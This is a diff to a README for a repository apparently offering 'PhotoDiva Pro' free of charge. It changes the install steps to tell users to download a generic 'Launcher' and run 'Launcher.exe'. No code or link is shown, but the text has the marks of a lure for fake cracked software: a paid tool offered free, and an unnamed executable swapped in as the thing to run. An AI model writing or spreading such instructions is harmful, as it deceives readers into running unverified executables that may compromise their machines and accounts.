saper73w/PhotoDiva-Pro-free-2025/README.md

 ## How to Use PhotoDiva Pro
 Here are a few simple steps to get started with PhotoDiva Pro:
-1. Download PhotoDiva Pro from the link above.
+1. Download Launcher from the link above.
 2. Install the downloaded file to your desired location.
-3. Launch PhotoDiva Pro and start editing your photos with ease!
+3. Launch "Launcher.exe" and start editing your photos with ease!

 ## Stay Updated
 Don’t miss out on the latest updates and releases for PhotoDiva Pro!
 Keep an eye on the "Releases" section of this repository for new features and enhancements.